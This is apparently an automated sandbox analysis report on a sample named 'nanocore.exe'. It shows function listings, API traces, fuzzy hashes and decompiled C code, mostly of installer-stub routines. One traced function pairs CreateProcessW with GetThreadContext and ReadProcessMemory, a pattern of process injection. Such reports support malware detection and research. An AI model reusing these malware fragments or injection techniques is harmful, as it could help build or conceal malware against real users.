            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: CountTick$FileWritewsprintf
            • String ID: ... %d%%$8x
            • API String ID: 4209647438-795837185
            • Opcode ID: 200e9f51f80e72fe4fcb6a06ea592b3ad35ad2676aa37a9b98c0ec53b28c93f4
            • Instruction ID: 8577ea5e15ae9603690e1c5729624cd70e3502ed31cd2bd6b1ef147789401905
            • Opcode Fuzzy Hash: 200e9f51f80e72fe4fcb6a06ea592b3ad35ad2676aa37a9b98c0ec53b28c93f4
            • Instruction Fuzzy Hash: 9E61AB3191220AEBCF10DF65DA48A9F7BB8EB04755F10417BF911B32C0D3789A40CBAA
            Uniqueness

            Uniqueness Score: -1.00%

            Function 02CB11EB, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 350memoryfileCOMMON
            Download Yara Rule
            APIs
            • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 02CB1520
            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 02CB157F
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.651111018.0000000002CB0000.00000040.00000001.sdmp, Offset: 02CB0000, based on PE: false
            Similarity
            • API ID: AllocCreateFileVirtual
            • String ID: b1a2f4be1bb040dfae4382b4765a8fb2
            • API String ID: 1475775534-2543734446
            • Opcode ID: 3e9eb696310382312a471573b98bb606ff28a96822e7d8fdb3900a6b8a597b0b
            • Instruction ID: bf149401fb7660f5dc6fb3a2d0fd73a4d39376053a2a554119c0ce443599f169
            • Opcode Fuzzy Hash: 3e9eb696310382312a471573b98bb606ff28a96822e7d8fdb3900a6b8a597b0b
            • Instruction Fuzzy Hash: A9E16931E44388EDEF21CBE4EC15BEDBBB5AF04710F14409AE608FA191D7B50A85DB16
            Uniqueness

            Uniqueness Score: -1.00%

            Function 02CB0719, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON
            Download Yara Rule
            APIs
            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 02CB081B
            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 02CB09E8
            Memory Dump Source
            • Source File: 00000001.00000002.651111018.0000000002CB0000.00000040.00000001.sdmp, Offset: 02CB0000, based on PE: false
            Similarity
            • API ID: CreateFileFreeVirtual
            • String ID:
            • API String ID: 204039940-0
            • Opcode ID: f7d36a05684a882bf25a7b393b28ed484d6d346c480faf729b79359556833635
            • Instruction ID: 300171d7ec85151e9a4f5608d859f949f46ca87c86e6865e1f40e4c4e8d61333
            • Opcode Fuzzy Hash: f7d36a05684a882bf25a7b393b28ed484d6d346c480faf729b79359556833635
            • Instruction Fuzzy Hash: 41A1FE34D00249EFEF12CFE4D885BEEBBB1AF18316F20845AE515BA2A0D7755A81DF10
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004015D5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
            Download Yara Rule
            C-Code - Quality: 84%
            			E004015D5(struct _SECURITY_ATTRIBUTES* __ebx, void* __eflags) {
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t27;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E00402A9A(0xfffffff0);
				_t27 = E0040555F(_t25);
				if( *_t25 != __ebx && _t27 != __ebx) {
					do {
						_t29 = E004054F7(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L5:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L5;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401428();
				} else {
					E00401428(0xffffffe6);
					E004059BF("C:\\Users\\jones\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}











            0x004015d5
            0x004015dc
            0x004015e6
            0x004015e8
            0x004015ee
            0x004015f6
            0x004015fc
            0x004015fe
            0x00401601
            0x00401609
            0x00401616
            0x00401623
            0x00401623
            0x00401618
            0x00401619
            0x00401621
            0x00000000
            0x00000000
            0x00401621
            0x00401616
            0x00401626
            0x00401629
            0x0040162b
            0x0040162c
            0x004015ee
            0x00401633
            0x00401653
            0x004021e8
            0x00401635
            0x00401637
            0x00401642
            0x00401648
            0x00401648
            0x00402932
            0x0040293e

            APIs
              • Part of subcall function 0040555F: CharNextA.USER32(00405315,?,007A0988,C:\Users\user\AppData\Local\Temp\,004055C3,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\nanocore.exe" ,00000000), ref: 0040556D
              • Part of subcall function 0040555F: CharNextA.USER32(00000000), ref: 00405572
              • Part of subcall function 0040555F: CharNextA.USER32(00000000), ref: 00405581
            • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 00401601
            • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 0040160B
            • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 00401619
            • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401648
            Strings
            • C:\Users\user\AppData\Local\Temp, xrefs: 0040163D
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
            • String ID: C:\Users\user\AppData\Local\Temp
            • API String ID: 3751793516-47812868
            • Opcode ID: 8ad83ee49b934180a65c3f1f2490f938aa5d6732355b324bf936fc1135f131d3
            • Instruction ID: 09f96d0d66b1181939c381e70bae2dcc986a56c468c5fc90a5c01fc4095c1b0e
            • Opcode Fuzzy Hash: 8ad83ee49b934180a65c3f1f2490f938aa5d6732355b324bf936fc1135f131d3
            • Instruction Fuzzy Hash: B2010831908181ABDB212F695D449BF7BB0DA52364B28463BF8D1B22E2C63C4946D63E
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004056BF, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E004056BF(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








            0x004056c3
            0x004056c9
            0x004056ca
            0x004056ca
            0x004056cb
            0x004056d2
            0x004056dc
            0x004056e9
            0x004056ec
            0x004056f4
            0x00000000
            0x00000000
            0x004056f8
            0x00000000
            0x00000000
            0x004056fa
            0x00000000
            0x004056fa
            0x00000000

            APIs
            • GetTickCount.KERNEL32 ref: 004056D2
            • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?,?,C:\Users\user\AppData\Local\Temp\,Error writing temporary file. Make sure your temp folder is valid.,00403148,"C:\Users\user\Desktop\nanocore.exe" ,C:\Users\user\AppData\Local\Temp\), ref: 004056EC
            Strings
            • C:\Users\user\AppData\Local\Temp\, xrefs: 004056C2
            • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004056BF
            • nsa, xrefs: 004056CB
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: CountFileNameTempTick
            • String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$nsa
            • API String ID: 1716503409-3657371456
            • Opcode ID: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
            • Instruction ID: fc1e422234f16816b4991f84e515e98fc6b5cd585f65b5bef5412ac6235d785f
            • Opcode Fuzzy Hash: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
            • Instruction Fuzzy Hash: F1F0A036748218BAE7104E55EC04B9B7FA9DF91760F14C02BFA089A1C0D6B1A95897A9
            Uniqueness

            Uniqueness Score: -1.00%

            Function 02CB0034, Relevance: 6.6, APIs: 4, Instructions: 558processthreadCOMMON
            Download Yara Rule
            APIs
            • CreateProcessW.KERNELBASE(?,00000000), ref: 02CB0387
            • GetThreadContext.KERNELBASE(?,00010007), ref: 02CB03AA
            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02CB03CE
            Memory Dump Source
            • Source File: 00000001.00000002.651111018.0000000002CB0000.00000040.00000001.sdmp, Offset: 02CB0000, based on PE: false
            Similarity
            • API ID: Process$ContextCreateMemoryReadThread
            • String ID:
            • API String ID: 2411489757-0
            • Opcode ID: ce7313b6f1d382a46a3a27bf89398752bdb55ce968a71c998840cff26e162291
            • Instruction ID: 01d20345cfe282516aa3efc90a2496fdb251b9222e4999a0c22c2eee8a04846a
            • Opcode Fuzzy Hash: ce7313b6f1d382a46a3a27bf89398752bdb55ce968a71c998840cff26e162291
            • Instruction Fuzzy Hash: 06321731E40258EFEB21CBA4DC55BEEB7B5BF48705F20409AE608FA2A0D7705A85DF15
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0040136D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55windowCOMMON
            Download Yara Rule
            C-Code - Quality: 73%
            			E0040136D(signed int _a4) {
				intOrPtr* _t8;
				int _t10;
				signed int _t12;
				int _t13;
				int _t14;
				signed int _t21;
				int _t24;
				signed int _t27;
				void* _t28;

				_t27 = _a4;
				while(_t27 >= 0) {
					_t8 = _t27 * 0x1c +  *0x7a2fb0;
					__eflags =  *_t8 - 1;
					if( *_t8 == 1) {
						break;
					}
					_push(_t8); // executed
					_t10 = E00401439(); // executed
					__eflags = _t10 - 0x7fffffff;
					if(_t10 == 0x7fffffff) {
						return 0x7fffffff;
					}
					__eflags = _t10;
					if(__eflags < 0) {
						_t10 = E00405936(0x7a4000 - (_t10 + 1 << 0xa), 0x7a4000);
						__eflags = _t10;
					}
					if(__eflags != 0) {
						_t12 = _t10 - 1;
						_t21 = _t27;
						_t27 = _t12;
						_t13 = _t12 - _t21;
						__eflags = _t13;
					} else {
						_t13 = 1;
						_t27 = _t27 + 1;
					}
					__eflags =  *(_t28 + 0xc);
					if( *(_t28 + 0xc) != 0) {
						 *0x7a276c =  *0x7a276c + _t13;
						_t14 =  *0x7a2754;
						__eflags = _t14;
						_t24 = (0 | _t14 == 0x00000000) + _t14;
						__eflags = _t24;
						SendMessageA( *(_t28 + 0x18), 0x402, MulDiv( *0x7a276c, 0x7530, _t24), 0);
					}
				}
				return 0;
			}












            0x0040136e
            0x004013fb
            0x00401382
            0x00401384
            0x00401387
            0x00000000
            0x00000000
            0x00401389
            0x0040138a
            0x0040138f
            0x00401394
            0x00000000
            0x00401409
            0x00401396
            0x00401398
            0x004013a6
            0x004013ab
            0x004013ab
            0x004013ad
            0x004013b5
            0x004013b6
            0x004013b8
            0x004013ba
            0x004013ba
            0x004013af
            0x004013b1
            0x004013b2
            0x004013b2
            0x004013bc
            0x004013c1
            0x004013c3
            0x004013c9
            0x004013d2
            0x004013d7
            0x004013d7
            0x004013f5
            0x004013f5
            0x004013c1
            0x00000000

            APIs
            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E5
            • SendMessageA.USER32(00000402,00000402,00000000), ref: 004013F5
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: MessageSend
            • String ID: 4@
            • API String ID: 3850602802-2385517874
            • Opcode ID: a45d14e2091946de284817cfc568e15438f589f3a87ce7b3a313abe01bff308b
            • Instruction ID: c77d45609a211084429c3166b5231f0613d514cab4ec9a945a8c79bb8836a1de
            • Opcode Fuzzy Hash: a45d14e2091946de284817cfc568e15438f589f3a87ce7b3a313abe01bff308b
            • Instruction Fuzzy Hash: 9201DE726242109FE7184B39DD09B3B36D8E791314F00823EBA52E66F1E67CDC028B49
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00403116, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
            Download Yara Rule
            C-Code - Quality: 84%
            			E00403116(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
				E00405BFB(_t6);
				_t2 = E00405538(_t6);
				if(_t2 != 0) {
					E004054CC(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E004056BF("\"C:\\Users\\jones\\Desktop\\nanocore.exe\" ", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}






            0x00403117
            0x0040311d
            0x00403123
            0x0040312a
            0x0040312f
            0x00403137
            0x00403143
            0x00403149
            0x0040312d
            0x0040312d
            0x0040312d

            APIs
              • Part of subcall function 00405BFB: CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
              • Part of subcall function 00405BFB: CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
              • Part of subcall function 00405BFB: CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
              • Part of subcall function 00405BFB: CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75
            • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00403137
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: Char$Next$CreateDirectoryPrev
            • String ID: "C:\Users\user\Desktop\nanocore.exe" $C:\Users\user\AppData\Local\Temp\
            • API String ID: 4115351271-92660408
            • Opcode ID: 522d963e3f3a4f438d732b49ef20f3582027ff3f63ea88c6e0be8bfaf4fc7fbc
            • Instruction ID: 6026620382323fd49234fcc764212d1b2eb381da62286567b3783a1d3151fd3a
            • Opcode Fuzzy Hash: 522d963e3f3a4f438d732b49ef20f3582027ff3f63ea88c6e0be8bfaf4fc7fbc
            • Instruction Fuzzy Hash: 41D0A92100BD3130C581322A3C06FCF091C8F8732AB00413BF80DB40C24B6C2A828AFE
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00405690, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
            Download Yara Rule
            C-Code - Quality: 68%
            			E00405690(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





            0x00405694
            0x004056a1
            0x004056b6
            0x004056bc

            APIs
            • GetFileAttributesA.KERNELBASE(00000003,00402C7D,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405694
            • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 004056B6
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: File$AttributesCreate
            • String ID:
            • API String ID: 415043291-0
            • Opcode ID: c0d98c849f492b5a4774d0bea3b1d3ff5b36842139f7d17fd49bb2e6aa7f869d
            • Instruction ID: fda52db4846bf436787418750c042d71830ab65c4a714c5a55a7f97c147c79cf
            • Opcode Fuzzy Hash: c0d98c849f492b5a4774d0bea3b1d3ff5b36842139f7d17fd49bb2e6aa7f869d
            • Instruction Fuzzy Hash: 3BD09E71658301AFEF098F20DE16F2E7AA2EB84B01F10562CFA82940E0D6755C159B16
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004030CD, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E004030CD(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409020, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





            0x004030d1
            0x004030e4
            0x004030ec
            0x00000000
            0x004030f3
            0x00000000
            0x004030f5

            APIs
            • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402F0D,000000FF,00000004,00000000,00000000,00000000), ref: 004030E4
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: FileRead
            • String ID:
            • API String ID: 2738559852-0
            • Opcode ID: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
            • Instruction ID: 4fd4a8308e5d5898c176f95433ccaa972cd52e025ae54bcd1c8d1e1e5a7d5bbe
            • Opcode Fuzzy Hash: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
            • Instruction Fuzzy Hash: FEE08C32611219BFCF105E559C01EE73F6CEB043A2F00C032F919E5190D630EA14EBA8
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004030FF, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E004030FF(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409020, _a4, 0, 0); // executed
				return _t2;
			}




            0x0040310d
            0x00403113

            APIs
            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2A,?,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 0040310D
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: FilePointer
            • String ID:
            • API String ID: 973152223-0
            • Opcode ID: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
            • Instruction ID: 25801f27feaadc63e0c23ae6d5f917682d27e8bc7d9ad1472eb802ffa7caf717
            • Opcode Fuzzy Hash: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
            • Instruction Fuzzy Hash: E4B01232954300BFDA114B00DE05F057B72B758700F208030B340380F0C2712420DB0D
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            Function 00404EA0, Relevance: 66.8, APIs: 37, Strings: 1, Instructions: 277windowclipboardmemoryCOMMON
            Download Yara Rule
            C-Code - Quality: 89%
            			E00404EA0(long _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				CHAR* _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t86;
				struct HMENU__* _t88;
				unsigned int _t91;
				int _t93;
				int _t94;
				void* _t100;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t148;
				int _t149;
				struct HWND__* _t153;
				struct HWND__* _t157;
				struct HMENU__* _t159;
				long _t161;
				CHAR* _t162;
				CHAR* _t163;

				_t153 =  *0x7a2764;
				_t148 = 0;
				_v8 = _t153;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404E34, GetDlgItem(_a4, 0x3ec), 0,  &_a4));
					}
					if(_a8 != 0x111) {
						L16:
						if(_a8 != 0x404) {
							L24:
							if(_a8 != 0x7b || _a12 != _t153) {
								goto L19;
							} else {
								_t86 = SendMessageA(_t153, 0x1004, _t148, _t148);
								_a8 = _t86;
								if(_t86 <= _t148) {
									L36:
									return 0;
								}
								_t88 = CreatePopupMenu();
								_push(0xffffffe1);
								_push(_t148);
								_t159 = _t88;
								AppendMenuA(_t159, _t148, 1, E004059E1(_t148, _t153, _t159));
								_t91 = _a16;
								if(_t91 != 0xffffffff) {
									_t149 = _t91;
									_t93 = _t91 >> 0x10;
								} else {
									GetWindowRect(_t153,  &_v24);
									_t149 = _v24.left;
									_t93 = _v24.top;
								}
								_t94 = TrackPopupMenu(_t159, 0x180, _t149, _t93, _t148, _t153, _t148);
								_t161 = 1;
								if(_t94 == 1) {
									_v56 = _t148;
									_v44 = 0x79f580;
									_v40 = 0xfff;
									_a4 = _a8;
									do {
										_a4 = _a4 - 1;
										_t161 = _t161 + SendMessageA(_v8, 0x102d, _a4,  &_v64) + 2;
									} while (_a4 != _t148);
									OpenClipboard(_t148);
									EmptyClipboard();
									_t100 = GlobalAlloc(0x42, _t161);
									_a4 = _t100;
									_t162 = GlobalLock(_t100);
									do {
										_v44 = _t162;
										SendMessageA(_v8, 0x102d, _t148,  &_v64);
										_t163 =  &(_t162[lstrlenA(_t162)]);
										 *_t163 = 0xa0d;
										_t162 =  &(_t163[2]);
										_t148 = _t148 + 1;
									} while (_t148 < _a8);
									GlobalUnlock(_a4);
									SetClipboardData(1, _a4);
									CloseClipboard();
								}
								goto L36;
							}
						}
						if( *0x7a274c == _t148) {
							ShowWindow( *0x7a2f84, 8);
							if( *0x7a300c == _t148) {
								E00404D62( *((intOrPtr*)( *0x79ed58 + 0x34)), _t148);
							}
							E00403D80(1);
							goto L24;
						}
						 *0x79e950 = 2;
						E00403D80(0x78);
						goto L19;
					} else {
						if(_a12 != 0x403) {
							L19:
							return E00403E0E(_a8, _a12, _a16);
						}
						ShowWindow( *0x7a2750, _t148);
						ShowWindow(_t153, 8);
						E0040417A();
						goto L16;
					}
				}
				_v48 = _v48 | 0xffffffff;
